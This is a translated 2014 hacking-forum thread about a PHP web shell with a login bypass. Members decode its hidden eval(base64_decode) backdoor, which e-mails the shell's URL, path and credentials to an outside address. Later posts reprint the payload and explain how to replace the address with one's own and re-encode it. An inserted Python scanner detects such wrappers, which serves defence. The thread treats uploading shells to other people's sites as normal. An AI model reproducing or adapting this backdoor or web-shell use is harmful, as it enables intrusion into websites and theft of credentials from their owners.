MadAgent Posted August 19, 2014
Login bypass exploit -> you can execute commands by sending parameters via POST or GET.
Example: SyRiAn Electronic Army Shell :: SEA Shell
Bypass: SyRiAn Electronic Army Shell :: SEA Shell
Also take a look at the command panel, so you no longer have to fumble around like Dorel with GET and POST...
Nytro Posted August 19, 2014
Backdoor:
<?php eval(base64_decode('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')); ?>
That is:
$site = "www.dev-pts.com/vb";
// Runs when the host name does not match the author's own site
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
    $to = "sattia34@gmail.com";
    $subject = "New Shell Uploaded";
    $header = "from: New Shell <saha21@dev-pts.com>";
    // The message carries the shell's URL, its path on disk and its login credentials
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $message .= " User : " . $user;
    $message .= " Pass : " . $pass;
    $sentmail = mail($to, $subject, $message, $header);
    echo "";
    exit;
}
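A defender-side triage check for the wrapper decoded in the post above, as an added example that is not part of the original thread: it finds `eval(base64_decode('...'))` in PHP source, decodes the payload statically (following nested layers), and reports outbound calls and e-mail addresses. The function name `scan_php`, the call list and the sample payload are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# eval(base64_decode('...')) with either quote style; whitespace tolerated.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)
# Assumed triage list: PHP calls that let a decoded payload send data off the host.
EXFIL_CALLS = re.compile(r"\b(mail|curl_exec|fsockopen|file_get_contents)\s*\(", re.I)
EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def scan_php(source, max_depth=3):
    """Return one finding per eval(base64_decode()) wrapper, nested layers included."""
    findings = []

    def walk(text, depth, outer_line):
        for m in EVAL_B64.finditer(text):
            # Nested layers are reported at the line of the outermost wrapper.
            line = outer_line or text.count("\n", 0, m.start()) + 1
            try:
                decoded = base64.b64decode(m.group(2)).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                continue  # quoted string is not valid base64
            findings.append({
                "line": line,
                "depth": depth,
                "calls": sorted({c.lower() for c in EXFIL_CALLS.findall(decoded)}),
                "emails": sorted(set(EMAIL.findall(decoded))),
                "decoded": decoded,
            })
            if depth + 1 < max_depth:
                walk(decoded, depth + 1, line)

    walk(source, 0, 0)
    return findings


# Constructed sample: a stand-in payload shaped like the one decoded in the post.
PAYLOAD = b'$to = "collector@example.invalid"; @mail($to, "New Shell Uploaded", $_SERVER["SERVER_NAME"]);'
SAMPLE = "<?php\n// ... shell code ...\neval(base64_decode('" + base64.b64encode(PAYLOAD).decode() + "'));\n?>"

if __name__ == "__main__":
    for f in scan_php(SAMPLE):
        print(f["line"], f["depth"], f["calls"], f["emails"])
```

A finding that lists `mail` together with an address outside your own domain is the pattern shown in this thread; the `decoded` field holds the payload text for manual review.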
CocolinoRST Posted August 19, 2014 (edited)
I found it on the net; I had no idea it had a backdoor, and I wasn't really curious enough to inspect it..
Edited September 24, 2014 by CocolinoRST
dancezar (Active Members) Posted August 19, 2014
> Well, I found it on the net and thought I'd share it with the RST users; I really didn't see that it's a backdoor or anything.. What is a backdoor, can someone explain it to me too? Could it be some virus, meaning I caught that virus? Or is a backdoor a virus with which you find out the data from a particular site?
If you put a shell on a site, the shell's developer, or some random guy, also has access to that shell.
CocolinoRST Posted August 19, 2014 (edited)
Thanks for the answer.
Edited September 24, 2014 by CocolinoRST
nonimporta Posted August 19, 2014
You weren't infected with anything, but the site you uploaded the shell to is compromised twice: once by you and once more by whoever planted that backdoor. It is a common practice with various hacking programs, scanners, etc. for the person who makes them to ensure they profit as much as possible from them.
CocolinoRST Posted August 20, 2014
Thanks for the information.
Scorpionadi Posted August 21, 2014
Out of curiosity, can't this shell be modified so that it is no longer backdoored? From what I understand it is a pretty good shell, and I think those who know PHP can make some modifications.
quadxenon Posted August 21, 2014
Wouldn't it be enough to delete the part of the code that Nytro showed?
dr.d3v1l Posted August 22, 2014
You take the code and base64-decode it:
$site = "www.dev-pts.com/vb";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
    $to = "masteritaliano@outlook.it";
    $subject = "New Shell Uploaded";
    $header = "from: New Shell <saha21@dev-pts.com>";
    $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $message .= " User : " . $user;
    $message .= " Pass : " . $pass;
    $sentmail = @mail($to, $subject, $message, $header);
    echo "";
    exit;
}
Then you base64-encode it and put it back in there.
quadxenon Posted August 22, 2014
> You take the code and base64-decode it:
> $site = "www.dev-pts.com/vb";
> if(!ereg($site, $_SERVER['SERVER_NAME']))
> {
>     $to = "masteritaliano@outlook.it";
>     $subject = "New Shell Uploaded";
>     $header = "from: New Shell <saha21@dev-pts.com>";
>     $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
>     $message .= "Path : " . __file__;
>     $message .= " User : " . $user;
>     $message .= " Pass : " . $pass;
>     $sentmail = @mail($to, $subject, $message, $header);
>     echo "";
>     exit;
> }
> Then you base64-encode it and put it back in there.
Don't forget to first put sugi.pula@lammere.com in place of masteritaliano@outlook.it, and only then base64-encode it.
CocolinoRST Posted August 22, 2014
You simply delete the part of the code that Nytro said is the backdoor. What could be simpler than that?
Sphere Posted August 25, 2014
Two days ago you didn't know what a backdoor is and were asking whether the PHP shell had given you a virus, and now you even know how to remove it. Aren't you dubious?
P.S. DUBIÓS (dubious) adj. 1. see uncertain. 2. see suspect. 3. equivocal, doubtful, shady, suspect
CocolinoRST Posted September 24, 2014
As you say, maybe I read up on it along the way.. But since, as you say, I'm so dubious, if you search on Google you'll see that I'm also wanted by N.A.S.A.. Bro, bad jokes like the ones you make are pointless, understand? A person can't even ask a question without some guy jumping in and mouthing off; and calm down, I told him what Nytro said, so how hard was it for me to read what Nytro said and say it here?